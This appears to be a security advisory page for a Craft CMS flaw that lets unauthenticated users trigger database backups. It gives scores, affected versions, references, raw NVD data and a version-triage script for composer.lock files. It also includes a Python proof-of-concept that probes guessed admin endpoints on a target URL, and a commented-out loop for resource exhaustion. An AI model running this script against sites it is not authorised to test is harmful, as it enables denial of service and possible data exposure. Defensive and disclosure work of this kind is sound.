Security Vulnerability Report
CVE-2025-68456 CVSS 9.1 CRITICAL

Published: 2026-01-05 22:15:53
Last Modified: 2026-01-12 18:19:38

Description

Craft is a platform for creating digital experiences. In versions 5.0.0-RC1 through 5.8.20 and 3.0.0 through 4.16.16, unauthenticated users can trigger database backup operations via specific admin actions, potentially leading to resource exhaustion or information disclosure. Users should update to the patched versions (5.8.21 and 4.16.17) to mitigate the issue. Craft 3 users should update to the latest Craft 4 and 5 releases, which include the fixes.

CVSS Details

CVSS Score (NVD, primary)
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H
CVSS 4.0 Score (secondary, from the CNA)
7.0 HIGH
CVSS 4.0 Vector
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:H/SC:N/SI:N/SA:N/E:P
Weaknesses
CWE-770 (Allocation of Resources Without Limits or Throttling), CWE-202 (Exposure of Sensitive Information Through Data Queries)

Configurations (Affected Products)

cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:* - VULNERABLE (from 3.0.0, before 4.16.17)
cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:* - VULNERABLE (from 5.0.1, before 5.8.21)
cpe:2.3:a:craftcms:craft_cms:5.0.0:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:craftcms:craft_cms:5.0.0:rc1:*:*:*:*:*:* - VULNERABLE
Craft CMS 5.0.0-RC1 through 5.8.20
Craft CMS 3.0.0 through 4.16.16
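For fleet triage the two ranges above are what matter: 3.0.0 up to but not including 4.16.17, and 5.0.0-RC1 up to but not including 5.8.21. The following is an added example, not code from this page or from Craft: it encodes those ranges and checks the craftcms/cms entry of a composer.lock against them, ordering pre-releases so that 5.0.0-RC1 sorts below 5.0.0. The composer.lock content is a constructed sample. Pre-releases earlier than 5.0.0-RC1 fall outside the published range and are reported as not affected, which says nothing about whether they are safe; treat them as unsupported and upgrade anyway.

```python
"""Triage helper for CVE-2025-68456: is a given Craft CMS version in the affected ranges?"""
import json
import re
from typing import Optional

# Affected ranges as published on this page: 3.0.0 through 4.16.16 (fixed in 4.16.17)
# and 5.0.0-RC1 through 5.8.20 (fixed in 5.8.21). Inclusive lower bound, exclusive upper.
_STAGE_ORDER = {"alpha": 0, "beta": 1, "rc": 2}
_VERSION_RE = re.compile(r"^v?(\d+)\.(\d+)\.(\d+)(?:-([A-Za-z]+)\.?(\d*))?$")


def parse_version(version: str) -> tuple:
    """Turn '5.0.0-RC1' / '4.16.16' into a tuple that sorts correctly.

    A pre-release sorts before the final release of the same number (5.0.0-RC1 < 5.0.0)
    and alpha < beta < rc. Anything else (e.g. Composer's 'dev-5.x') is rejected.
    """
    m = _VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised Craft version string: {version!r}")
    major, minor, patch = int(m.group(1)), int(m.group(2)), int(m.group(3))
    stage = m.group(4)
    if stage is None:
        return (major, minor, patch, 1, 0, 0)          # 1 = final release
    if stage.lower() not in _STAGE_ORDER:
        raise ValueError(f"unknown pre-release stage in {version!r}")
    return (major, minor, patch, 0, _STAGE_ORDER[stage.lower()], int(m.group(5) or 0))


AFFECTED_RANGES = [
    (parse_version("3.0.0"), parse_version("4.16.17")),
    (parse_version("5.0.0-RC1"), parse_version("5.8.21")),
]


def is_affected(version: str) -> bool:
    v = parse_version(version)
    return any(lo <= v < hi for lo, hi in AFFECTED_RANGES)


def recommended_fix(version: str) -> Optional[str]:
    """Patched release for the installed major, per the advisory text on this page."""
    major = parse_version(version)[0]
    if major == 5:
        return "5.8.21"
    if major == 4:
        return "4.16.17"
    if major == 3:
        return "4.16.17 or 5.8.21 (Craft 3 itself receives no fix)"
    return None


def check_composer_lock(lock_text: str) -> Optional[dict]:
    """Find craftcms/cms in a composer.lock and report whether it is in range.

    Returns None when Craft is not in the lock file at all.
    """
    lock = json.loads(lock_text)
    for pkg in lock.get("packages", []) + lock.get("packages-dev", []):
        if pkg.get("name") == "craftcms/cms":
            version = pkg["version"]
            affected = is_affected(version)
            return {
                "version": version,
                "affected": affected,
                "fix": recommended_fix(version) if affected else None,
            }
    return None


# Constructed sample lock file (not from any real project) so the script runs stand-alone.
SAMPLE_COMPOSER_LOCK = json.dumps({
    "packages": [
        {"name": "craftcms/cms", "version": "5.8.20"},
        {"name": "example/unrelated-package", "version": "1.2.3"},
    ],
    "packages-dev": [],
})

if __name__ == "__main__":
    print(check_composer_lock(SAMPLE_COMPOSER_LOCK))
```

Run it against the real `composer.lock` of each Craft project rather than against the version string the control panel shows; the lock file is what was actually deployed, and a project pinned to `5.8.*` can still be sitting on 5.8.20 until `composer update` is run.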

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2025-68456 PoC - Craft CMS Unauthenticated Database Backup Trigger
This PoC demonstrates how an unauthenticated attacker can trigger database backup operations
"""
import requests
import sys
import time


def trigger_backup(target_url):
    """
    Trigger database backup without authentication
    """
    # Try common admin action endpoints. These paths are the PoC author's guesses;
    # the advisory text on this page does not name the affected controller action.
    endpoints = [
        '/actions/craft-app/backups/create',
        '/actions/craft-app/database/backups/create',
        '/api/backups',
        '/admin/actions/craft-app/backups/create'
    ]
    headers = {
        'User-Agent': 'Craft CMS Backup Trigger PoC',
        'Content-Type': 'application/json',
        'X-Craft-Action': 'backup'
    }
    for endpoint in endpoints:
        url = target_url.rstrip('/') + endpoint
        try:
            response = requests.post(url, headers=headers, timeout=30)
            if response.status_code in [200, 302, 403]:
                print(f"[*] Endpoint {endpoint} responded with status {response.status_code}")
                # Any 200 is reported as "potential": a site that serves its 404 page
                # with status 200 will also match, so verify before drawing conclusions.
                if response.status_code == 200:
                    print(f"[!] Potential backup trigger at {url}")
                    return True
        except requests.RequestException as e:
            print(f"[-] Error accessing {endpoint}: {e}")
    return False


def resource_exhaustion_attack(target_url, iterations=10):
    """
    Perform resource exhaustion by repeatedly triggering backups
    """
    print(f"[*] Starting resource exhaustion attack ({iterations} iterations)...")
    for i in range(iterations):
        print(f"[*] Iteration {i + 1}/{iterations}")
        trigger_backup(target_url)
        time.sleep(2)  # Wait between requests
    print("[*] Attack completed")


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-68456.py <target_url>")
        print("Example: python cve-2025-68456.py https://vulnerable-site.com")
        sys.exit(1)
    target = sys.argv[1]
    print(f"[*] Target: {target}")
    print("[*] CVE-2025-68456: Craft CMS Unauthenticated Database Backup Trigger")
    # Check if backup can be triggered
    if trigger_backup(target):
        print("[!] Vulnerability confirmed - backup can be triggered")
        # Uncomment to perform DoS attack
        # resource_exhaustion_attack(target, iterations=50)
    else:
        print("[-] Could not confirm vulnerability")
```

References

https://github.com/craftcms/cms/security/advisories/GHSA-v64r-7wg9-23pr (Vendor Advisory, Exploit)
https://github.com/craftcms/cms/commit/f83d4e0c6b906743206b4747db4abf8164b8da39 (Patch)
https://github.com/craftcms/cms/blob/5.x/CHANGELOG.md#5821---2025-12-04 (Release Notes)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-68456",
    "sourceIdentifier": "security-advisories@github.com",
    "published": "2026-01-05T22:15:52.727",
    "lastModified": "2026-01-12T18:19:38.220",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Craft is a platform for creating digital experiences. In versions 5.0.0-RC1 through 5.8.20 and 3.0.0 through 4.16.16, unauthenticated users can trigger database backup operations via specific admin actions, potentially leading to resource exhaustion or information disclosure. Users should update to the patched versions (5.8.21 and 4.16.17) to mitigate the issue. Craft 3 users should update to the latest Craft 4 and 5 releases, which include the fixes."
      }
    ],
    "metrics": {
      "cvssMetricV40": [
        {
          "source": "security-advisories@github.com",
          "type": "Secondary",
          "cvssData": {
            "version": "4.0",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
            "baseScore": 7.0,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "attackRequirements": "PRESENT",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "vulnConfidentialityImpact": "HIGH",
            "vulnIntegrityImpact": "NONE",
            "vulnAvailabilityImpact": "HIGH",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "subAvailabilityImpact": "NONE",
            "exploitMaturity": "PROOF_OF_CONCEPT",
            "confidentialityRequirement": "NOT_DEFINED",
            "integrityRequirement": "NOT_DEFINED",
            "availabilityRequirement": "NOT_DEFINED",
            "modifiedAttackVector": "NOT_DEFINED",
            "modifiedAttackComplexity": "NOT_DEFINED",
            "modifiedAttackRequirements": "NOT_DEFINED",
            "modifiedPrivilegesRequired": "NOT_DEFINED",
            "modifiedUserInteraction": "NOT_DEFINED",
            "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
            "modifiedVulnIntegrityImpact": "NOT_DEFINED",
            "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
            "modifiedSubConfidentialityImpact": "NOT_DEFINED",
            "modifiedSubIntegrityImpact": "NOT_DEFINED",
            "modifiedSubAvailabilityImpact": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "Automatable": "NOT_DEFINED",
            "Recovery": "NOT_DEFINED",
            "valueDensity": "NOT_DEFINED",
            "vulnerabilityResponseEffort": "NOT_DEFINED",
            "providerUrgency": "NOT_DEFINED"
          }
        }
      ],
      "cvssMetricV31": [
        {
          "source": "nvd@nist.gov",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
            "baseScore": 9.1,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "security-advisories@github.com",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-202"},
          {"lang": "en", "value": "CWE-770"}
        ]
      },
      {
        "source": "nvd@nist.gov",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-770"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "3.0.0",
                "versionEndExcluding": "4.16.17",
                "matchCriteriaId": "269DCC5B-520D-4FA8-9D7B-3984EE16D5C8"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "5.0.1",
                "versionEndExcluding": "5.8.21",
                "matchCriteriaId": "DD1EB061-284A-4708-BC67-DE02EF7A5E79"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:craftcms:craft_cms:5.0.0:-:*:*:*:*:*:*",
                "matchCriteriaId": "1C7461CF-35AB-48E1-88B6-956DAE1D2AB4"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:craftcms:craft_cms:5.0.0:rc1:*:*:*:*:*:*",
                "matchCriteriaId": "8D8E02D1-601A-4E2B-B619-4775BFDB72D0"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/craftcms/cms/blob/5.x/CHANGELOG.md#5821---2025-12-04",
        "source": "security-advisories@github.com",
        "tags": ["Product", "Release Notes"]
      },
      {
        "url": "https://github.com/craftcms/cms/commit/f83d4e0c6b906743206b4747db4abf8164b8da39",
        "source": "security-advisories@github.com",
        "tags": ["Patch"]
      },
      {
        "url": "https://github.com/craftcms/cms/security/advisories/GHSA-v64r-7wg9-23pr",
        "source": "security-advisories@github.com",
        "tags": ["Exploit", "Vendor Advisory"]
      },
      {
        "url": "https://github.com/craftcms/cms/security/advisories/GHSA-v64r-7wg9-23pr",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "tags": ["Exploit", "Vendor Advisory"]
      }
    ]
  }
}
```